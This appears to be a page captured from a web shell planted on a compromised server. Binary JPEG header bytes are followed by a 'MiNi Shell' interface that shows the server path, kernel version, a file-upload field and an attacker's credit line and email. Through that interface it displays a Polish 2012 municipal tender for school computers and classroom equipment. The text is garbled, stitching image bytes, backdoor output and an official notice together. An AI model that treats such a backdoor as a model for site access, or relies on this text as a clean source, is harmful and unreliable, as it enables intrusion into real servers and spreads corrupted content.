JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120904/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120904/329936-N-2012.html

<p class="kh_header"><b>Świeszyno: Dostawa pomocy dydaktycznych do realizacji zadań w ramach pilotażu Rządowego programu rozwijania kompetencji uczniów i nauczycieli w zakresie stosowania technologii informacyjno - komunikacyjnej (Cyfrowa szkoła) dla szkół podstawowych Gminy Świeszyno, tj. Szkoły Podstawowej w Dunowie i Szkoły Podstawowej 
w Konikowie.</b><br>
<b>Numer ogłoszenia: 329936 - 2012; data zamieszczenia: 04.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świeszyno , Świeszyno 71, 76-024 Świeszyno, woj. zachodniopomorskie, tel. 94 31 60 120, faks 94 31 61 491.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ug.swieszyno.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pomocy dydaktycznych do realizacji zadań w ramach pilotażu Rządowego programu rozwijania kompetencji uczniów i nauczycieli w zakresie stosowania technologii informacyjno - komunikacyjnej (Cyfrowa szkoła) dla szkół podstawowych Gminy Świeszyno, tj. Szkoły Podstawowej w Dunowie i Szkoły Podstawowej 
w Konikowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Zamówienie obejmuje dostawę sprzętu niezbędnego do wyposażenia szkół podstawowych Gminy Świeszyno, tj. Szkoły Podstawowej w Dunowie oraz Szkoły Podstawowej w Konikowie  w nowoczesne pomoce dydaktyczne niezbędne do realizacji programów nauczania z wykorzystaniem TIK (obszar e-szkoła) oraz zapewnienie uczniom szkół podstawowych dostępu do nowoczesnych pomocy dydaktycznych, w szczególności mobilnego sprzętu komputerowego, do korzystania na zajęciach lekcyjnych i w czasie wolnym od zajęć dydaktycznych (obszar e-uczeń) w ramach Pilotażu Rządowego Programu rozwijania kompetencji uczniów i nauczycieli w zakresie stosowania technologii informacyjno - komunikacyjnych Cyfrowa szkoła.
Wszystkie pomoce dydaktyczne muszą spełniać następujące warunki: 
posiadają deklarację CE, posiadają certyfikat ISO9001 dla producenta sprzętu, w przypadku komputerów przenośnych, spełniają wymogi normy Energy Star 5.0, są fabrycznie nowe (wyprodukowane w 2012r.) i wolne od obciążeń prawami osób trzecich, posiadają dołączone niezbędne instrukcje i materiały dotyczące użytkowania w języku polskim, posiadają okres gwarancji udzielonej przez dostawcę nie krótszy niż 3 lata (w przypadku tablic interaktywnych - nie krótszy niż 5 lat), dostawca zapewnia serwis w miejscu dostawy i instalacji sprzętu
UWAGA: cena jednostkowa każdego z zaoferowanych artykułów musi być niższa niż 3500,00 zł brutto.
Celem programu jest rozwijanie kompetencji uczniów i nauczycieli w zakresie stosowania TIK w procesie edukacyjnym oraz wspieranie zmiany modelu nauczania w kierunku rozwijania kreatywności, umiejętności kooperacji oraz krytycznego myślenia, w tym wyszukiwania, oceny i twórczego wykorzystywania dostępnych źródeł wiedzy. 
2) Miejscem dostawy FRANCO jest Szkoła Podstawowa w Konikowie, Konikowo 47, 76 - 024 Świeszyno oraz Szkoła Podstawowa w Dunowie, Dunowo11, 76-024 Świeszyno. 
3) Wykonawca poniesie wszystkie koszty z tytułu należytej realizacji opisanego przedmiotu zamówienia, a w szczególności koszty: dostarczenia, załadunku, rozładunku przedmiotu umowy, ubezpieczenia transportu przedmiotu umowy, gwarancji jakości na dostarczony towar. 
4) Zamawiający podzielił zamówienie na 2 części ze względu na miejsce realizacji projektu oraz ich specyfikę. Przedmiot zamówienia obejmuje części odpowiadające poniższym zadaniom:
Część I: Szkoła Podstawowa w Konikowie:
Zadanie 1 Tablica interaktywna z oprogramowaniem i systemem mocowania ściennego (1 sztuka): efektywna powierzchnia tablicy (obszar interaktywny), o przekątnej co najmniej 78 cali, gwarancja producenta na tablicę - co najmniej 5 lat, pisaki do obsługi tablicy, autoryzowany przez producenta tablicy serwis w Polsce, certyfikowany zgodnie z normą ISO9001:2000 lub ISO9001:2008 w zakresie urządzeń audiowizualnych, wraz z tablicą dostarczenie przewodnika (w języku polskim): metodycznego dla nauczycieli dotyczącego wykorzystywania tablicy w procesie dydaktycznym i podręcznika użytkownika tablicy, polska wersja językowa oprogramowania, wraz z pomocą kontekstową, możliwość instalacji oprogramowania na co najmniej 5 komputerów, bezpłatny i nieograniczony czasowo dostęp do aktualizacji i nowych wersji oprogramowania, importowanie i eksportowanie materiałów powstałych na tablicy w czasie zajęć (notatek, obiektów) w formacie Whiteboard Common File Format (CFF), wpisywanie i zachowywanie notatek wykonanych przy pomocy na tablicy w plikach popularnych aplikacji, komunikacja z komputerem bezprzewodowym (bluetooth), tablica bezprzewodowa
Zadanie 2 Projektor multimedialny (1 sztuka): jasność 2600 ANSI Lumenów w trybie pełnej jasności, rozdzielczość podstawowa XGA (1024x768), kontrast 2000:1, żywotność lampy 3000 godzin w trybie pełnej jasności, poziom hałasu 35dB w trybie pełnej jasności, obiektyw Zoom, gwarancja producenta na projektor 36 miesięcy, gwarancja producenta na lampę 36 miesięcy, polska wersja oprogramowania
Zadanie 3 Szafka do przechowywania i bezpiecznego przemieszczania (2 sztuki):dwie szafki na 22 komputery, funkcja ładowania baterii
Zadanie 4 Przenośny komputer dla nauczyciela (4 sztuki): ekran o przekątnej co najmniej 15,6 cali, wydajność komputera w teście MobileMark*2007 Performance Rating Productivity Test min 230, pamięc operacyjna RAM co najmniej 8 GB, dysk twardy o pojemności co najmniej 500 GB, łącze sieci bezprzewodowej zgodne ze standardem 802.11n, co najmniej trzy złącza USB (rekomendowane USB 3.0), złącze VGA, złącze HDMI, złącze słuchawkowe, zintegrowana kamera i mikrofon, zintegrowana karta dźwiękowa, (opcjonalne) uniwersalny czytnik zewnętrznych kart pamięci, podwyższona odporność mechaniczna, podwyższona wytrzymałość mechaniczna, ciężar poniżej 2,7 kilograma, czas pracy na baterii co najmniej 4 godziny, gwarancja co najmniej trzy lata, torba, wypełnianie warunków Energy Star 5.0, certyfikat ISO 9001 producenta sprzętu, (rekomendacja) certyfikat komputera dla danego systemu operacyjnego (obecność na Hardwaren Compatibility List), zainstalowany system operacyjny zgodny z oddzielnie wyspecyfikowanymi wymaganiami, współpracujący z oprogramowaniami edukacyjnymi i tablicami interaktywnymi, bluetooth zintegrowany
Zadanie 5 Przenośny komputer dla ucznia (22 sztuki):ekran o przekątnej co najmniej 15,6 cali, wydajność komputera w teście MobileMark*2007 Performance Rating Productivity Test min 180, pamięć operacyjna RAM co najmniej 4 GB, dysk twardy o pojemności co najmniej 500 GB, łącze sieci bezprzewodowej zgodne ze standardem 802.11n, co najmniej trzy złącza USB (rekomendowane USB 3.0), złącze VGA, złącze HDMI, złącze słuchawkowe, zintegrowana kamera i mikrofon, zintegrowana karta dźwiękowa, fizyczna klawiatura, urządzenie wskazujące, podwyższona odporność mechaniczna, podwyższona wytrzymałość mechaniczna, ciężar poniżej 2,5 kilograma, czas pracy na baterii co najmniej 4 godziny, gwarancja co najmniej trzy lata, torba, wypełnianie warunków Energy Star 5.0, certyfikat ISO 9001 producenta sprzętu, (rekomendacja) certyfikat komputera dla danego systemu operacyjnego (obecność na Hardwaren Compatibility List), zainstalowany system operacyjny zgodny z oddzielnie wyspecyfikowanymi wymaganiami, współpracujący z oprogramowaniami edukacyjnymi i tablicami interaktywnymi, bluetooth zintegrowany

Część II: Szkoła Podstawowa w Dunowie: 
Zadanie 1 Tablica interaktywna z oprogramowaniem i systemem mocowania ściennego (1 sztuka): efektywna powierzchnia tablicy (obszar interaktywny), o przekątnej co najmniej 78 cali, gwarancja producenta na tablicę - co najmniej 5 lat, pisaki do obsługi tablicy, autoryzowany przez producenta tablicy serwis w Polsce, certyfikowany zgodnie z normą ISO9001:2000 lub ISO9001:2008 w zakresie urządzeń audiowizualnych, wraz z tablicą dostarczenie przewodnika (w języku polskim): metodycznego dla nauczycieli dotyczącego wykorzystywania tablicy w procesie dydaktycznym i podręcznika użytkownika tablicy, polska wersja językowa oprogramowania, wraz z pomocą kontekstową, możliwość instalacji oprogramowania na co najmniej 5 komputerów, bezpłatny i nieograniczony czasowo dostęp do aktualizacji i nowych wersji oprogramowania, importowanie i eksportowanie materiałów powstałych na tablicy w czasie zajęć (notatek, obiektów) w formacie Whiteboard Common File Format (CFF), wpisywanie i zachowywanie notatek wykonanych przy pomocy na tablicy w plikach popularnych aplikacji, komunikacja z komputerem bezprzewodowym (bluetooth), tablica bezprzewodowa
Zadanie 2 Projektor multimedialny (3 sztuki): jasność 2600 ANSI Lumenów w trybie pełnej jasności, rozdzielczość podstawowa XGA (1024x768), kontrast 2000:1, żywotność lampy 3000 godzin w trybie pełnej jasności, poziom hałasu 35dB w trybie pełnej jasności, obiektyw Zoom, gwarancja producenta na projektor 36 miesięcy, gwarancja producenta na lampę 36 miesięcy, polska wersja oprogramowania
Zadanie 3 Ekran projekcyjny (3 sztuki): szerokość 200 cm (powierzchnia projekcyjna), ekran ścienny, waga maksymalnie 10 kilogramów, wysokość ekranu po rozłożeniu 170 cm max, rączka do przenoszenia zamontowana na stałe do ekranu, blokada mechanizmu rozwijania ekranu na czas transportu, powierzchnia projekcyjna w formacie 4:3
Zadanie 4 Kontroler WLAN zarządzający szkolną siecią bezprzewodową (1 sztuka): dynamiczne zarządzanie częstotliwością: automatyczna kontrola siły sygnału oraz wykorzystywanego kanału, aby zapewnić maksymalne pokrycie zasięgiem, samonaprawiająca się sieć: automatyczna diagnostyka wraz z usuwaniem martwych stref WLAN. Punkty dostępowe z możliwością adaptacji siły oraz kanału w zależności od otoczenia balansowanie obciążeniem oraz ograniczanie przepustowości: gwarantowanie pasma wszystkim użytkownikom sieci bezprzewodowej bez utraty jakości sygnału, dynamiczne balansowanie obciążeniem poprzez przełączanie użytkowników: w zależności od liczby użytkowników i zasięgu sygnału radiowego, kontroler umożliwiający przełączanie zarejestrowanych klientów pomiędzy mniej obciążone punkty dostępowe, mapy pięter oraz propagacji sygnału: mapy propagacji sygnału na podstawie częstotliwości, kanału i siły sygnału, prostota lokalizowania przez administratora wrogich punktów dostępowych, przyłączonych klientów oraz ich prezentacja na mapie budynku, szybkie przełączanie pomiędzy Vlan oraz podsieciami: niezauważalne szybkie przełączanie w L2 oraz L3 wsparcie dla aplikacji wrażliwych na opóźnienia, zoptymalizowanie pod centralne oraz rozporoszone architektury: automatyczne przełączanie lokalnego ruchu w celu jak najszybszego przesłania. Przetwarzanie ruchu L3 jest na poziomie kontrolera oraz przesyłanie do kontrolera za pomocą szyfrowanego tunelu, dostęp dla połączenia typu gość, 5 portów, kontrola przepustowości i nadzór IP
Zadanie 5 Punkt dostępowy będący elementem szkolnej sieci bezprzewodowej (Access Point) (3 sztuki): praca w standardzie 802.11 G, N, jednoczesna obsługa częstotliwości 2.4GHz oraz 5GHz, punkt dostępowy powinien współpracować również ze starszymi urządzeniami 802.11a, 802.11g oraz 802.11b, zintegrowana obsługa Power oraz Ethernet (IEE 802.3af PoE/0, zasilanie punktu dostępowego poprzez wykorzystanie do tego celu dedykowanego przełącznika sieciowego obsługującego system POE, możliwość centralnego zarządzania poprzez kontroler, obejmowanie dużego obszaru dzięki protokołowi WDS oraz połączeniu point-to- point lub point-to-multipoint, funkcje bezpieczeństwa obejmujące WPA, WPA2, wykrywanie wrogich AP oraz 802.1x wraz z wsparciem dla RADIUS, prosty oraz szybki montaż pozwalający na instalację na suficie oraz ścianie, wewnętrzne anteny zoptymalizowane dla największego  możliwego zasięgu
Zadanie 6. Szafka do przechowywania i bezpiecznego przemieszczania pomiędzy salami lekcyjnymi  przenośnych komputerów dla uczniów (2 sztuki): funkcja ładowania baterii, 10 skrytek
Zadanie 7 Przenośny komputer dla ucznia (13 sztuk): ekran o przekątnej co najmniej 15,6 cali, wydajność komputera w teście MobileMark*2007 Performance Rating Productivity Test min 180, pamięć operacyjna RAM co najmniej 4 GB, dysk twardy o pojemności co najmniej 500 GB, łącze sieci bezprzewodowej zgodne ze standardem 802.11n, co najmniej trzy złącza USB (rekomendowane USB 3.0), złącze VGA,złącze HDMI, złącze słuchawkowe, zintegrowana kamera i mikrofon, zintegrowana karta dźwiękowa, fizyczna klawiatura, urządzenie wskazujące, podwyższona odporność mechaniczna, podwyższona wytrzymałość mechaniczna, ciężar poniżej 2,5 kilograma, czas pracy na baterii co najmniej 4 godziny, gwarancja co najmniej trzy lata, torba, wypełnianie warunków Energy Star 5.0, certyfikat ISO 9001 producenta sprzętu, (rekomendacja) certyfikat komputera dla danego systemu operacyjnego (obecność na Hardwaren Compatibility List), zainstalowany system operacyjny zgodny z oddzielnie wyspecyfikowanymi wymaganiami, współpracujący z oprogramowaniami edukacyjnymi i tablicami interaktywnymi, bluetooth zintegrowany
Zadanie 8 Przenośny komputer dla nauczyciela (4 sztuki): ekran o przekątnej co najmniej 15,6 cali, wydajność komputera w teście MobileMark*2007 Performance Rating Productivity Test min 230, pamięc operacyjna RAM co najmniej 8 GB, dysk twardy o pojemności co najmniej 500 GB, łącze sieci bezprzewodowej zgodne ze standardem 802.11n, co najmniej trzy złącza USB (rekomendowane USB 3.0), złącze VGA, złącze HDMI, złącze słuchawkowe, zintegrowana kamera i mikrofon, zintegrowana karta dźwiękowa, (opcjonalne) uniwersalny czytnik zewnętrznych kart pamięci, podwyższona odporność mechaniczna, podwyższona wytrzymałość mechaniczna, ciężar poniżej 2,7 kilograma, czas pracy na baterii co najmniej 4 godziny, gwarancja co najmniej trzy lata, torba, wypełnianie warunków Energy Star 5.0, certyfikat ISO 9001 producenta sprzętu, (rekomendacja) certyfikat komputera dla danego systemu operacyjnego (obecność na Hardwaren Compatibility List), zainstalowany system operacyjny zgodny z oddzielnie wyspecyfikowanymi wymaganiami, współpracujący z oprogramowaniami edukacyjnymi i tablicami interaktywnymi, bluetooth zintegrowany
Zadanie 9 Głośniki (4 zestawy): zestaw głośników 5+1, min. 47W, głośniki satelitarne z minimum dwucalową membraną, regulacja dźwięku (głośność, tony niskie, tony wysokie), niskotonowy z minimum pięciocalowa membraną, pasmo przenoszenia: 80 - 18000Hz, porty wejściowe: 2xRCA, stalowa siatka ochronna głośników uniemożliwiająca manipulowanie przy membranach, przystosowanie do instalacji na ścianie (uchwyty producenta głośnika), pilot zdalnego sterowania, przewody głośnikowe, kabel 2RCA - 2RCA min. 3 metry, konwerter 2RCA - 3,5 metra, JACK min. 3 metry
Zadanie 10 Router (1 sztuka):zalecana liczba jednoczesnych połączeń 65000, ochrona przed zagrożeniami płynącymi z sieci Internet, skaner antywirusowy oraz baza sygnatur, zabezpieczenia sieci przed zagrożeniami typu wirusy, robaki, konie trojańskie, spyware, rootkity, keyloggery, wbudowana technologia rozproszonego wykrywania spamu niewymagająca dodatkowej konfiguracji, możliwość blokowania w czasie rzeczywistym ataków z Internetu, wbudowany system blokowania włamań IPS oraz wbudowana funkcja zapory sieciowej, obsługa IPsec & SSL VPN..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.23.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza: 
1) aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę adresu siedziby, zmianę formy prawnej itp, 2) zmianę terminów realizacji zamówienia z przyczyn niezależnych od Wykonawcy lub Zamawiającego, które to przyczyny każda ze Stron musi udokumentować, pod warunkiem, że takiej zgody udzieli instytucja dofinansowująca i że Zamawiający nie straci dofinansowania,
3) jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, 
4) ze względu na dofinansowane zadania możliwa jest zmiana umowy w zakresie konieczności dostosowania umowy z Wykonawcą do postanowień umowy o dofinansowanie,
5) zmiany sposobu rozliczania umowy lub dokonywania płatności.
Warunki dokonywania zmian:
1) inicjowanie zmian na wniosek Wykonawcy lub Zamawiającego, 2) uzasadnienie zmiany prawidłową realizacją przedmiotu umowy, 3) zmiany umowy, o których mowa powyżej muszą być dokonywane z zachowaniem przepisu art. 140 ust. 3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. 2010r. Nr 113, poz. 759 z późn. zm.) stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawarte w SIWZ, 4) forma pisemna pod rygorem nieważności w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ug.swieszyno.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Świeszyno - ZOS, Świeszyno 71, tel: 94 31 60 130, Szkoła Podstawowa w Konikowie, Konikowo 47, tel.94 31 61 222, Szkoła Podstawowa w Dunowie, Dunowo 11, tel. 94 31 61 477.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.09.2012 godzina 13:30, miejsce: Sekretariat Urzędu Gminy Świeszyno, Świeszyno 71, 76-024 Świeszyno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com